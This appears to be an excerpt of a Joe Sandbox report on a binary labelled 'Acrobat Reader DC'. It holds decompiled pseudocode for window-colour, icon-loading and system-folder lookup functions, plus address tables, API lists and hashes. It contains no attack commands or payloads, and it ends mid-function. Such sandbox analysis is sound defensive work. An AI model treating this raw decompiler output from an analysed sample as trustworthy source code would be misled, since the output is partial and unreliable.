                                  0x00448d1f
                                  0x00448cda
                                  0x00000000
                                  0x00000000
                                  0x0044882a
                                  0x00448835
                                  0x0044883c
                                  0x0044883c
                                  0x00448842
                                  0x00448848
                                  0x00000000
                                  0x0044884a
                                  0x0044884a
                                  0x0044884c
                                  0x0044884f
                                  0x00448856
                                  0x00000000
                                  0x00448876
                                  0x00448876
                                  0x0044887e
                                  0x0044888d
                                  0x00448893
                                  0x00448896
                                  0x00448898
                                  0x0044889f
                                  0x004488a9
                                  0x004488b1
                                  0x004488bd
                                  0x004488c3
                                  0x004488c6
                                  0x004488d3
                                  0x004488d3
                                  0x0044887e
                                  0x00448856
                                  0x00000000
                                  0x00448868
                                  0x00448868
                                  0x00448869
                                  0x00448871
                                  0x00000000
                                  0x00000000
                                  0x00448ab8
                                  0x00448aba
                                  0x00448ac9
                                  0x00448ad7
                                  0x00448ad9
                                  0x00448adf
                                  0x00448adf
                                  0x00000000
                                  0x00448ad7
                                  0x00000000
                                  0x00000000
                                  0x00448804
                                  0x00448806
                                  0x00448809
                                  0x0044880f
                                  0x0044881f
                                  0x00000000
                                  0x0044881f
                                  0x00000000
                                  0x00000000
                                  0x004487ec
                                  0x004487ef
                                  0x004487fa
                                  0x00448b28
                                  0x00448b28
                                  0x00448b28
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004487e3
                                  0x0044873a
                                  0x0044873a
                                  0x00448742
                                  0x00448742
                                  0x00000000

                                  APIs
                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004487BD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Window
                                  • String ID: 0
                                  • API String ID: 2353593579-4108050209
                                  • Opcode ID: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                  • Instruction ID: 06508bea8339de1511a48146ac1d08a96458f0089f80555ee302a354f7131a6f
                                  • Opcode Fuzzy Hash: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                  • Instruction Fuzzy Hash: 35B18BB0204341ABF324CF24CC89BABBBE4FB89744F14491EF591962D1DBB8A845CB59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0044A032 Relevance: 31.7, APIs: 21, Instructions: 198windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0044A032(signed int _a4, char _a7, struct HDC__* _a8, struct HDC__* _a12) {
				int _v16;
				void* _v20;
				intOrPtr _t44;
				long _t48;
				long _t52;
				long _t53;
				struct HWND__* _t58;
				intOrPtr _t78;
				struct HDC__* _t79;
				signed int _t94;
				struct HWND__** _t95;
				long _t96;
				long _t97;

				_t44 =  *0x4a8690; // 0x0
				_t80 = _a4;
				_t78 =  *((intOrPtr*)( *((intOrPtr*)(_t44 + _a4 * 4))));
				_t94 = E00441B7C(0x4a8630, _a12);
				_a7 = 0;
				_t97 = GetSysColor(0xf);
				_t48 =  *(_t78 + 0x4c);
				if(_t48 != 0xffffffff) {
					_t97 = _t48;
				}
				if(_t94 == 0xffffffff) {
					L33:
					SetBkColor(_a8, _t97);
					return E00441432(_t80, __eflags, _t97, 0);
				} else {
					_t80 =  *0x4a86a4; // 0xa71980
					_t95 =  *( *(_t80 + _t94 * 4));
					_t52 = _t95[0x11];
					if(_t52 < 0 || _t95[0x22] == 0x1b) {
						_t80 = _t95[0x22] & 0x000000ff;
						__eflags = _t80 - 0x1b;
						if(__eflags > 0) {
							L16:
							__eflags = _t52 - 0xfffffffe;
							_t29 =  &_a7;
							 *_t29 = _t52 == 0xfffffffe;
							__eflags =  *_t29;
							goto L17;
						} else {
							switch( *((intOrPtr*)(_t80 * 4 +  &M0044A29A))) {
								case 0:
									__eflags = GetWindowLongW( *__edi, 0xfffffff0) & 0x08000800;
									if(__eflags == 0) {
										goto L14;
									} else {
										__eax = GetSysColor(0xf);
									}
									goto L17;
								case 1:
									L14:
									_t97 = GetSysColor(5);
									goto L17;
								case 2:
									goto L16;
								case 3:
									_a7 = 1;
									goto L17;
								case 4:
									__eflags = _t95[0x22] - 0xff;
									if(__eflags != 0) {
										GetClientRect( *(_t78 + 0x18c),  &_v20);
										SendMessageW( *(_t78 + 0x18c), 0x1328, 0,  &_v20);
										_t72 = GetWindowDC( *(_t78 + 0x18c));
										_a12 = _t72;
										_t73 = GetPixel(_t72, _v20, _v16);
										_t80 =  *(_t78 + 0x18c);
										_t97 = _t73;
										ReleaseDC( *(_t78 + 0x18c), _a12);
										__eflags = _t97 - 0xffffffff;
										if(__eflags == 0) {
											__eflags =  *0x49751c;
											if(__eflags != 0) {
												goto L14;
											} else {
												_t97 = GetSysColor(0xf);
											}
										}
										goto L17;
									}
									goto L31;
								case 5:
									goto L17;
							}
						}
					} else {
						_t97 = _t52;
						L17:
						if(_t95[0x22] != 0xff && _t95[0x11] == 0xffffffff) {
							_t58 = _t95[0x22];
							if(_t58 == 0x17) {
								L30:
								_a7 = 1;
							} else {
								if(_t58 != 7 && _t58 != 1 && _t58 != 2 && _t58 != 3 && _t58 != 0) {
									_t79 = GetWindowDC( *_t95);
									_t97 = GetPixel(_t79, 0, 0);
									if(_t97 == 0xffffffff) {
										_t80 = _t95[0x21] - 1;
										_t97 = GetPixel(_t79, _t95[0x21] - 1, 0);
										if(_t97 == 0xffffffff) {
											_t97 = GetPixel(_t79, 0, _t95[0x21] - 1);
											if(_t97 == 0xffffffff) {
												_t80 = _t95[0x21] - 1;
												_t97 = GetPixel(_t79, _t95[0x21] - 1, _t95[0x21] - 1);
											}
										}
									}
									ReleaseDC( *_t95, _t79);
									if(_t97 == 0xffffffff) {
										goto L30;
									}
								}
							}
						}
					}
					L31:
					_t96 = _t95[0x12];
					if(_t96 == 0xffffffff) {
						_t53 = GetSysColor(8);
						_t80 = _a8;
						SetTextColor(_a8, _t53);
					} else {
						SetTextColor(_a8, _t96);
					}
					if(_a7 == 0) {
						goto L33;
					} else {
						SetBkMode(_a8, 1);
						return GetStockObject(5);
					}
				}
			}
















                                  0x0044a038
                                  0x0044a03d
                                  0x0044a047
                                  0x0044a058
                                  0x0044a05a
                                  0x0044a064
                                  0x0044a066
                                  0x0044a06c
                                  0x0044a06e
                                  0x0044a06e
                                  0x0044a073
                                  0x0044a247
                                  0x0044a24c
                                  0x0044a260
                                  0x0044a079
                                  0x0044a079
                                  0x0044a082
                                  0x0044a084
                                  0x0044a089
                                  0x0044a09b
                                  0x0044a0a2
                                  0x0044a0a5
                                  0x0044a16b
                                  0x0044a16b
                                  0x0044a16e
                                  0x0044a16e
                                  0x0044a16e
                                  0x00000000
                                  0x0044a0ab
                                  0x0044a0b2
                                  0x00000000
                                  0x0044a146
                                  0x0044a14b
                                  0x00000000
                                  0x0044a14d
                                  0x0044a14f
                                  0x0044a155
                                  0x00000000
                                  0x00000000
                                  0x0044a159
                                  0x0044a161
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0044a165
                                  0x00000000
                                  0x00000000
                                  0x0044a0b9
                                  0x0044a0c0
                                  0x0044a0d1
                                  0x0044a0e9
                                  0x0044a0f6
                                  0x0044a105
                                  0x0044a108
                                  0x0044a10e
                                  0x0044a114
                                  0x0044a11b
                                  0x0044a121
                                  0x0044a124
                                  0x0044a126
                                  0x0044a12d
                                  0x00000000
                                  0x0044a12f
                                  0x0044a137
                                  0x0044a137
                                  0x0044a12d
                                  0x00000000
                                  0x0044a124
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0044a0b2
                                  0x0044a094
                                  0x0044a094
                                  0x0044a172
                                  0x0044a179
                                  0x0044a189
                                  0x0044a191
                                  0x0044a234
                                  0x0044a234
                                  0x0044a197
                                  0x0044a199
                                  0x0044a1c6
                                  0x0044a1d1
                                  0x0044a1d6
                                  0x0044a1e1
                                  0x0044a1ea
                                  0x0044a1ef
                                  0x0044a203
                                  0x0044a208
                                  0x0044a21a
                                  0x0044a223
                                  0x0044a223
                                  0x0044a208
                                  0x0044a1ef
                                  0x0044a229
                                  0x0044a232
                                  0x00000000
                                  0x00000000
                                  0x0044a232
                                  0x0044a199
                                  0x0044a191
                                  0x0044a179
                                  0x0044a238
                                  0x0044a238
                                  0x0044a23e
                                  0x0044a265
                                  0x0044a26b
                                  0x0044a270
                                  0x0044a240
                                  0x0044a270
                                  0x0044a270
                                  0x0044a27a
                                  0x00000000
                                  0x0044a27c
                                  0x0044a282
                                  0x0044a296
                                  0x0044a296
                                  0x0044a27a

                                  APIs
                                  • GetSysColor.USER32(0000000F), ref: 0044A05E
                                  • GetClientRect.USER32 ref: 0044A0D1
                                  • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A0E9
                                  • GetWindowDC.USER32(?), ref: 0044A0F6
                                  • GetPixel.GDI32(00000000,?,?), ref: 0044A108
                                  • ReleaseDC.USER32 ref: 0044A11B
                                  • GetSysColor.USER32(0000000F), ref: 0044A131
                                  • GetWindowLongW.USER32(?,000000F0), ref: 0044A140
                                  • GetSysColor.USER32(0000000F), ref: 0044A14F
                                  • GetSysColor.USER32(00000005), ref: 0044A15B
                                  • GetWindowDC.USER32(?), ref: 0044A1BE
                                  • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A1CB
                                  • GetPixel.GDI32(00000000,?,00000000), ref: 0044A1E4
                                  • GetPixel.GDI32(00000000,00000000,?), ref: 0044A1FD
                                  • GetPixel.GDI32(00000000,?,?), ref: 0044A21D
                                  • ReleaseDC.USER32 ref: 0044A229
                                  • SetBkColor.GDI32(?,00000000), ref: 0044A24C
                                  • GetSysColor.USER32(00000008), ref: 0044A265
                                  • SetTextColor.GDI32(?,00000000), ref: 0044A270
                                  • SetBkMode.GDI32(?,00000001), ref: 0044A282
                                  • GetStockObject.GDI32(00000005), ref: 0044A28A
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                                  • String ID:
                                  • API String ID: 1744303182-0
                                  • Opcode ID: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                  • Instruction ID: 0380b5c53d8a23173c1b90063483f03488caaf4f58ae5d2001aea5c06c56dff4
                                  • Opcode Fuzzy Hash: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                  • Instruction Fuzzy Hash: E6612531140101ABE7109F78CC88BAB7764FB46320F14876AFD659B3D0DBB49C529BAA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004341E6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 91windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E004341E6(intOrPtr _a4, int _a8, short* _a12, long _a16) {
				void* __edi;
				long _t9;
				struct HINSTANCE__* _t11;
				struct HINSTANCE__* _t12;
				struct HINSTANCE__* _t13;
				struct HINSTANCE__* _t14;
				char* _t24;
				short* _t25;

				_t25 = _a12;
				_t9 = 0;
				_t24 = _a16;
				 *_t24 = 0;
				_a16 = 0;
				if( *_t25 == 0) {
					L13:
					return _t9;
				} else {
					if(E004114AB(_t24, _t25, L"blank") != 0) {
						_t11 = E004114AB(_t24, _t25, L"info");
						if(_t11 == 0) {
							return LoadIconW(_t11, 0x7f04);
						}
						_t12 = E004114AB(_t24, _t25, L"question");
						if(_t12 != 0) {
							_t13 = E004114AB(_t24, _t25, L"stop");
							if(_t13 != 0) {
								_t14 = E004114AB(_t24, _t25, L"warning");
								if(_t14 != 0) {
									ExtractIconExW(_t25, _a8, 0,  &_a16, 1);
									_t9 = _a16;
									if(_t9 == 0) {
										goto L13;
									} else {
										 *_t24 = 1;
										return _t9;
									}
								} else {
									return LoadIconW(_t14, 0x7f03);
								}
							} else {
								return LoadIconW(_t13, 0x7f01);
							}
						} else {
							return LoadIconW(_t12, 0x7f02);
						}
					} else {
						return  *((intOrPtr*)(_a4 + 0x1b0));
					}
				}
			}











                                  0x004341ea
                                  0x004341ed
                                  0x004341f0
                                  0x004341f3
                                  0x004341f5
                                  0x004341fb
                                  0x004342da
                                  0x004342da
                                  0x00434201
                                  0x00434211
                                  0x004342bb
                                  0x004342c5
                                  0x00000000
                                  0x004342d1
                                  0x0043422c
                                  0x00434236
                                  0x00434250
                                  0x0043425a
                                  0x00434274
                                  0x0043427e
                                  0x0043429f
                                  0x004342a5
                                  0x004342aa
                                  0x00000000
                                  0x004342ac
                                  0x004342ac
                                  0x004342b2
                                  0x004342b2
                                  0x00434280
                                  0x0043428f
                                  0x0043428f
                                  0x0043425c
                                  0x0043426b
                                  0x0043426b
                                  0x00434238
                                  0x00434247
                                  0x00434247
                                  0x00434217
                                  0x00434223
                                  0x00434223
                                  0x00434211

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: __wcsicoll$IconLoad
                                  • String ID: blank$info$question$stop$warning
                                  • API String ID: 2485277191-404129466
                                  • Opcode ID: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                  • Instruction ID: a4c8356a5cb7371e963c7ba7671977edd7eb5cf64b0a9c0e84f2fcb3e6131cad
                                  • Opcode Fuzzy Hash: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                  • Instruction Fuzzy Hash: 9121A732B4021566DB00AB65BC05FEF3358DB98762F040837FA05E2282E3A9A52093BD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004720DB Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 377timeCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 70%
                                  			E004720DB(void* __eflags, void* __fp0, long _a4, struct HDC__* _a8, char _a12) {
				signed int _v6;
				struct _SYSTEMTIME* _v8;
				struct HWND__* _v12;
				char _v16;
				char _v20;
				char _v28;
				char _v36;
				struct tagRECT _v52;
				signed int _v56;
				char _v68;
				char _v100;
				char _v626;
				short _v628;
				char _v644;
				char _v660;
				char _v676;
				char _v684;
				char _v700;
				char _v708;
				char _v716;
				char _v732;
				char _v740;
				char _v748;
				char _v756;
				char _v772;
				char _v780;
				short _v800;
				char _v1330;
				char _v1332;
				signed int __ebx;
				struct HWND__* __edi;
				signed int __esi;
				void* _t195;
				struct HDC__* _t215;
				signed int _t229;
				void* _t233;
				void* _t235;
				void* _t241;

				_t241 = __fp0;
				_t215 = _a8;
				_v628 = 0;
				E00412F40( &_v626, 0, 0x208);
				_v1332 = 0;
				E00412F40( &_v1330, 0, 0x208);
				_t235 = _t233 + 0x18;
				_t229 = 0;
				_v8 = _a12;
				while(1) {
					_t195 = E0041313C( *((intOrPtr*)(0x491770 + _t229 * 4)), _v8);
					_t235 = _t235 + 8;
					if(_t195 == 0) {
						break;
					}
					_t229 = _t229 + 1;
					if(_t229 < 0x60) {
						continue;
					}
					break;
				}
				_t239 = _t229 - 0x60;
				if(_t229 != 0x60) {
					__eflags = _t229 - 0x5f;
					if(__eflags > 0) {
						L144:
						E00402250( &_a12);
						__eflags = 0;
						return 0;
					} else {
						switch( *((intOrPtr*)(_t229 * 4 +  &M00472DC7))) {
							case 0:
								__ecx =  *__esi;
								__edx =  *( *__esi + 4);
								__eax =  *( *__esi + 4) + __esi + 4;
								__edi =  *(E00403CC0( *( *__esi + 4) + __esi + 4) + 0x14);
								__esi = __ebx;
								__eax = E00408F40(__edi, __ebx);
								 *__ebx = __edi;
								goto L143;
							case 1:
								__eax =  *__esi;
								__ecx =  *( *__esi + 4);
								__eax = __ecx + __esi + 4;
								E00403CC0(__ecx + __esi + 4) = __eax + 0x20;
								__eax = E00408E80(__ebx, __ecx, __eax);
								__ecx =  &_a12;
								E00402250( &_a12) = 0;
								__eflags = 0;
								return 0;
								goto L145;
							case 2:
								__edx =  &_v20;
								GetLocalTime(__edx);
								__eax = _v6 & 0x0000ffff;
								_push(_v6 & 0x0000ffff);
								_push(L"%.3d");
								__ecx =  &_v628;
								_push( &_v628);
								goto L16;
							case 3:
								__edx =  &_v644;
								 &_v684 = E00441E23( &_v644,  &_v684);
								__edi = __eax;
								__esi = __ebx;
								__eax = E0040E6A0(__ecx, __eax, __ebx);
								__ecx =  &_v644;
								__eax = E00402250( &_v644);
								__ecx =  &_a12;
								E00402250( &_a12) = 0;
								__eflags = 0;
								return 0;
								goto L145;
							case 4:
								_t44 =  &_v772; // 0x48beb0
								__ecx = _t44;
								_t45 =  &_v756; // 0x48bec0
								__eax = E00441E23(_t45, _t45);
								__edi = __eax;
								__esi = __ebx;
								__eax = E0040E6A0(__ecx, __eax, __ebx);
								_t46 =  &_v772; // 0x48beb0
								__ecx = _t46;
								__eax = E00402250(_t46);
								_t47 =  &_a12; // 0x48c1c0
								__ecx = _t47;
								E00402250(_t47) = 0;
								__eflags = 0;
								return 0;
								goto L145;
							case 5:
								_t48 =  &_v732; // 0x48bee0
								__eax = _t48;
								_t49 =  &_v708; // 0x48bef8
								__ecx = _t49;
								__eax = E00441E23(__edx, _t49);
								__edi = __eax;
								__esi = __ebx;
								__eax = E0040E6A0(__ecx, __eax, __ebx);
								_t50 =  &_v732; // 0x48bee0
								__ecx = _t50;
								__eax = E00402250(_t50);
								_t51 =  &_a12; // 0x48c1c8
								__ecx = _t51;
								E00402250(_t51) = 0;
								__eflags = 0;
								return 0;
								goto L145;
							case 6:
								_t52 =  &_v660; // 0x48bf30
								__edx = _t52;
								_t53 =  &_v716; // 0x48bef8
								_t53 = E00441E23(_t52, _t53);
								__edi = __eax;
								__esi = __ebx;
								__eax = E0040E6A0(__ecx, __eax, __ebx);
								_t54 =  &_v660; // 0x48bf30
								__ecx = _t54;
								__eax = E00402250(_t54);
								_t55 =  &_a12; // 0x48c1d0
								__ecx = _t55;
								E00402250(_t55) = 0;
								__eflags = 0;
								return 0;
								goto L145;
							case 7:
								_t56 =  &_v676; // 0x485e8c
								__ecx = _t56;
								_t57 =  &_v780; // 0x485e24
								__eax = E00441E23(_t57, _t57);
								__edi = __eax;
								__esi = __ebx;
								__eax = E0040E6A0(__ecx, __eax, __ebx);
								_t58 =  &_v676; // 0x485e8c
								__ecx = _t58;
								__eax = E00402250(_t58);
								_t59 =  &_a12; // 0x48613c
								__ecx = _t59;
								E00402250(_t59) = 0;
								__eflags = 0;
								return 0;
								goto L145;
							case 8:
								_t60 =  &_v700; // 0x48bf10
								__eax = _t60;
								_t61 =  &_v748; // 0x48bee0
								__ecx = _t61;
								__eax = E00441E23(__edx, _t61);
								__edi = __eax;
								__esi = __ebx;
								__eax = E0040E6A0(__ecx, __eax, __ebx);
								_t62 =  &_v700; // 0x48bf10
								__ecx = _t62;
								__eax = E00402250(_t62);
								_t63 =  &_a12; // 0x48c1d8
								__ecx = _t63;
								E00402250(_t63) = 0;
								__eflags = 0;
								return 0;
								goto L145;
							case 9:
								_t64 =  &_v740; // 0x48bef0
								__edx = _t64;
								__eax = E00441E23(__edx, __edx);
								_push(__eax);
								_push(L"%d");
								_t65 =  &_v628; // 0x48bf60
								__eax = _t65;
								_push(_t65);
								L16:
								__eax = E0041329B(__edx);
								goto L17;
							case 0xa:
								__ecx =  &_v68;
								__eax = E00441E23( &_v28,  &_v28);
								__edi = __eax;
								__esi = __ebx;
								__eax = E0040E6A0(__ecx, __eax, __ebx);
								__ecx =  &_v68;
								__eax = E00402250( &_v68);
								__ecx =  &_a12;
								E00402250( &_a12) = 0;
								__eflags = 0;
								return 0;
								goto L145;
							case 0xb:
								_t70 =  &_v628; // 0x48bf68
								__eax = _t70;
								_push(_t70);
								_push(0);
								_push(0);
								_push(0x26);
								_push(0);
								__imp__SHGetFolderPathW();
								goto L18;
							case 0xc:
								_t71 =  &_v628; // 0x48bf68
								__ecx = _t71;
								_push(__ecx);
								_push(0);
								_push(0);
								_push(0x2b);
								_push(0);
								__imp__SHGetFolderPathW();
								goto L18;
							case 0xd:
								_t72 =  &_v628; // 0x48bf68
								__edx = _t72;
								_push(_t72);
								_push(0);
								_push(0);
								_push(5);
								_push(0);
								__imp__SHGetFolderPathW();
								goto L18;
							case 0xe:
								_t73 =  &_v628; // 0x48bf68
								__eax = _t73;
								_push(_t73);
								_push(0);
								_push(0);
								_push(0x23);
								_push(0);
								__imp__SHGetFolderPathW();
								goto L18;
							case 0xf:
								_t74 =  &_v628; // 0x48bf68
								__ecx = _t74;
								_push(__ecx);
								_push(0);
								_push(0);
								_push(0x19);
								_push(0);
								__imp__SHGetFolderPathW();
								goto L18;
							case 0x10:
								_t75 =  &_v628; // 0x48bf68
								__edx = _t75;
								_push(_t75);
								_push(0);
								_push(0);
								_push(0x2e);
								_push(0);
								__imp__SHGetFolderPathW();
								goto L18;
							case 0x11:
								_t76 =  &_v628; // 0x48bf68
								__eax = _t76;
								_push(_t76);
								_push(0);
								_push(0);
								_push(0x1f);
								_push(0);
								__imp__SHGetFolderPathW();
								goto L18;
							case 0x12:
								_t77 =  &_v628; // 0x48bf68
								__ecx = _t77;
								_push(__ecx);
								_push(0);
								_push(0);
								_push(0x17);
								_push(0);
								__imp__SHGetFolderPathW();
								goto L18;
							case 0x13:
								_t78 =  &_v628; // 0x48bf68
								__edx = _t78;
								_push(_t78);
								_push(0);
								_push(0);
								_push(0x16);
								_push(0);
								__imp__SHGetFolderPathW();
								goto L18;
							case 0x14:
								__eax =  &_v628;
								_push( &_v628);
								_push(0);
								_push(0);
								_push(0x18);
								_push(0);
								__imp__SHGetFolderPathW();
								goto L18;
							case 0x15:
								__ecx =  &_v628;
								_push(__ecx);
								_push(0);
								_push(0);
								_push(0x1a);
								_push(0);
								__imp__SHGetFolderPathW();
								goto L18;
							case 0x16:
								__edx =  &_v628;
								_push( &_v628);
								_push(0);
								_push(0);
								_push(0x10);
								_push(0);
								__imp__SHGetFolderPathW();
								goto L18;
							case 0x17:
								__eax =  &_v628;
								_push( &_v628);
								_push(0);
								_push(0);
								_push(6);
								_push(0);
								__imp__SHGetFolderPathW();
								goto L18;
							case 0x18:
								__ecx =  &_v628;
								_push(__ecx);
								_push(0);
								_push(0);
								_push(2);
								_push(0);
								__imp__SHGetFolderPathW();
								goto L18;
							case 0x19:
								__edx =  &_v628;
								_push( &_v628);
								_push(0);
								_push(0);
								_push(0xb);
								_push(0);
								__imp__SHGetFolderPathW();
								goto L18;
							case 0x1a:
								__eax =  &_v628;
								_push( &_v628);
								_push(0);
								_push(0);
								_push(7);
								_push(0);
								__imp__SHGetFolderPathW();
								goto L18;
							case 0x1b:
								__ecx =  &_a4;
								__edx =  &_v628;
								_a4 = 0x104;
								__eax = GetComputerNameW( &_v628, __ecx);
								goto L18;
							case 0x1c:
								__eax =  &_v628;
								__eax = GetWindowsDirectoryW( &_v628, 0x104);
								__eflags = __eax;
								if(__eax == 0) {
									goto L144;
								} else {
									goto L18;
								}
								goto L145;
							case 0x1d:
								__ecx =  *0x4a9604;
								__eflags = __ecx[0x16];
								_push(0x104);
								__edx =  &_v628;
								_push( &_v628);
								if(__eflags == 0) {
									__eax = GetSystemDirectoryW();
								} else {
									__eax = 0;
									_v16 = 0;
									_v8 = 0;
									__eax =  &_v16;
									E00430E0D(__eflags,  &_v16) = __eax->i();
									__ecx =  &_v16;
									__eax = E00430CCB(__ecx);
								}
								goto L18;
							case 0x1e:
								L141:
								__esi = __ebx;
								goto L142;
							case 0x1f:
								__esi = __ebx;
								__eax = E00408F40(__edi, __ebx);
								 *__ebx = 6;
								goto L143;
							case 0x20:
								__esi = __ebx;
								__eax = E00408F40(__edi, __ebx);
								 *__ebx = 3;
								goto L143;
							case 0x21:
								__esi = __ebx;
								__eax = E00408F40(__edi, __ebx);
								 *__ebx = 9;
								goto L143;
							case 0x22:
								__esi = __ebx;
								__eax = E00408F40(__edi, __ebx);
								 *__ebx = 5;
								goto L143;
							case 0x23:
								__esi = __ebx;
								__eax = E00408F40(__edi, __ebx);
								 *__ebx = 0xa;
								goto L143;
							case 0x24:
								__esi = __ebx;
								__eax = E00408F40(__edi, __ebx);
								 *__ebx = 0x40;
								goto L143;
							case 0x25:
								__esi = __ebx;
								__eax = E00408F40(__edi, __ebx);
								 *__ebx = 0x41;
								goto L143;
							case 0x26:
								__esi = __ebx;
								__eax = E00408F40(__edi, __ebx);
								 *__ebx = 2;
								goto L143;
							case 0x27:
								__esi = __ebx;
								__eax = E00408F40(__edi, __ebx);
								 *__ebx = 7;
								goto L143;
							case 0x28:
								__esi = __ebx;
								__eax = E00408F40(__edi, __ebx);
								 *__ebx = 8;
								goto L143;
							case 0x29:
								__esi = __ebx;
								__eax = E00408F40(__edi, __ebx);
								 *__ebx = 4;
								goto L143;
							case 0x2a:
								L128:
								__esi = __ebx;
								__eax = E00408F40(__edi, __ebx);
								 *__ebx = 1;
								goto L143;
							case 0x2b:
								__esi = __ebx;
								__eax = E00408F40(__edi, __ebx);
								 *__ebx = 0x42;
								goto L143;
							case 0x2c:
								__esi = __ebx;
								__eax = E00408F40(__edi, __ebx);
								 *__ebx = 0x43;
								goto L143;
							case 0x2d:
								__eflags =  *0x4974ea - 1;
								goto L60;
							case 0x2e:
								__eflags =  *0x4a8719 - 1;
								L60:
								__esi = __ebx;
								if(__eflags != 0) {
									L142:
									__eax = E00408F40(__edi, __esi);
									 *__ebx = 0;
								} else {
									__eax = E00408F40(__edi, __esi);
									 *__ebx = 1;
								}
								goto L143;
							case 0x2f:
								__eax =  *(__esi + 0xc8);
								goto L19;
							case 0x30:
								__eax =  *(__esi + 0xb8);
								goto L19;
							case 0x31:
								__eax =  *(__esi + 0xd8);
								goto L19;
							case 0x32:
								__eax =  *(__esi + 0xf4);
								__eax = E004348AA( *(__esi + 0xf4));
								__esi = __ebx;
								__edi = __eax;
								__eax = E00408F40(__edi, __ebx);
								 *__ebx = __edi;
								goto L143;
							case 0x33:
								__ecx =  &_v628;
								__eax = GetCurrentDirectoryW(0x104, __ecx);
								goto L18;
							case 0x34:
								__eax = L"WIN32_NT";
								goto L19;
							case 0x35:
								__eax =  *0x4a9604;
								__eflags =  *((char*)(__eax + 0x2a)) - 1;
								if( *((char*)(__eax + 0x2a)) != 1) {
									__eflags =  *((char*)(__eax + 0x28)) - 1;
									if( *((char*)(__eax + 0x28)) != 1) {
										__eflags =  *((char*)(__eax + 0x26)) - 1;
										if( *((char*)(__eax + 0x26)) != 1) {
											__eflags =  *((char*)(__eax + 0x24)) - 1;
											if( *((char*)(__eax + 0x24)) != 1) {
												__eflags =  *((char*)(__eax + 0x22)) - 1;
												if( *((char*)(__eax + 0x22)) != 1) {
													__eflags =  *((char*)(__eax + 0x20)) - 1;
													if( *((char*)(__eax + 0x20)) != 1) {
														__eflags =  *((char*)(__eax + 0x1e)) - 1;
														if( *((char*)(__eax + 0x1e)) != 1) {
															__eflags =  *((char*)(__eax + 0x1c)) - 1;
															if( *((char*)(__eax + 0x1c)) != 1) {
																goto L99;
